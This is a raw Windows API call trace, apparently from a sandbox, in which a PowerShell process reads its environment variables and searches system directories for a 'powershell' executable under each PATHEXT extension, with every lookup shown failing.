	[0751.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.768] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.772] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0751.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.773] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0753.300] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0753.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.300] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0753.302] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0753.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.303] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0753.304] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0753.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.304] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0753.307] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0753.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.307] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0753.308] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0753.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.309] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0753.310] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0753.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.310] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0754.406] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0754.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.406] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0754.427] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0754.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0754.427] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0757.300] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0757.300] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0757.300] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0757.303] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0757.303] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0757.303] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0757.303] CoTaskMemAlloc (cb=0x128) returned 0x2a3f50
	[0757.303] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2a3f50, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0757.303] CoTaskMemFree (pv=0x2a3f50) 
	[0757.309] CoTaskMemAlloc (cb=0x20e) returned 0x1b7c65e0
	[0757.309] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7c65e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0757.309] CoTaskMemFree (pv=0x1b7c65e0) 
	[0757.313] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0757.316] SetErrorMode (uMode=0x1) returned 0x1
	[0757.319] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.589] SetErrorMode (uMode=0x1) returned 0x1
	[0758.591] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0758.591] SetErrorMode (uMode=0x1) returned 0x1
	[0758.591] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.599] SetErrorMode (uMode=0x1) returned 0x1
	[0758.601] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0758.601] SetErrorMode (uMode=0x1) returned 0x1
	[0758.601] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0758.612] SetErrorMode (uMode=0x1) returned 0x1
	[0758.614] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0758.614] SetErrorMode (uMode=0x1) returned 0x1
	[0758.614] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0760.085] SetErrorMode (uMode=0x1) returned 0x1
	[0760.086] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0760.087] SetErrorMode (uMode=0x1) returned 0x1
	[0760.087] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0760.095] SetErrorMode (uMode=0x1) returned 0x1
	[0760.096] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0760.097] SetErrorMode (uMode=0x1) returned 0x1
	[0760.097] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0760.105] SetErrorMode (uMode=0x1) returned 0x1
	[0760.106] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0760.107] SetErrorMode (uMode=0x1) returned 0x1
	[0760.107] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0760.115] SetErrorMode (uMode=0x1) returned 0x1
	[0761.230] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0761.230] SetErrorMode (uMode=0x1) returned 0x1
	[0761.230] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0766.939] SetErrorMode (uMode=0x1) returned 0x1
	[0766.943] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0766.944] SetErrorMode (uMode=0x1) returned 0x1
	[0766.944] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0766.952] SetErrorMode (uMode=0x1) returned 0x1
	[0766.953] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0766.953] SetErrorMode (uMode=0x1) returned 0x1
	[0766.953] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0766.962] SetErrorMode (uMode=0x1) returned 0x1
	[0766.963] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0766.963] SetErrorMode (uMode=0x1) returned 0x1
	[0766.963] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0766.972] SetErrorMode (uMode=0x1) returned 0x1
	[0766.973] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0766.974] SetErrorMode (uMode=0x1) returned 0x1
	[0766.974] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0768.639] SetErrorMode (uMode=0x1) returned 0x1
	[0768.640] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0768.640] SetErrorMode (uMode=0x1) returned 0x1
	[0768.641] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0768.649] SetErrorMode (uMode=0x1) returned 0x1
	[0768.651] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0768.651] SetErrorMode (uMode=0x1) returned 0x1
	[0768.651] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.190] SetErrorMode (uMode=0x1) returned 0x1
	[0771.191] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0771.191] SetErrorMode (uMode=0x1) returned 0x1
	[0771.191] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.200] SetErrorMode (uMode=0x1) returned 0x1
	[0771.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.201] SetErrorMode (uMode=0x1) returned 0x1
	[0771.202] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.202] SetErrorMode (uMode=0x1) returned 0x1
	[0771.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.202] SetErrorMode (uMode=0x1) returned 0x1
	[0771.202] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.203] SetErrorMode (uMode=0x1) returned 0x1
	[0771.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.203] SetErrorMode (uMode=0x1) returned 0x1
	[0771.203] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.203] SetErrorMode (uMode=0x1) returned 0x1
	[0771.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.204] SetErrorMode (uMode=0x1) returned 0x1
	[0771.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.204] SetErrorMode (uMode=0x1) returned 0x1
	[0771.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.283] SetErrorMode (uMode=0x1) returned 0x1
	[0771.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.284] SetErrorMode (uMode=0x1) returned 0x1
	[0771.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.284] SetErrorMode (uMode=0x1) returned 0x1
	[0771.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.285] SetErrorMode (uMode=0x1) returned 0x1
	[0771.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.285] SetErrorMode (uMode=0x1) returned 0x1
	[0771.285] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.285] SetErrorMode (uMode=0x1) returned 0x1
	[0771.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.286] SetErrorMode (uMode=0x1) returned 0x1
	[0771.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.286] SetErrorMode (uMode=0x1) returned 0x1
	[0771.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.286] SetErrorMode (uMode=0x1) returned 0x1
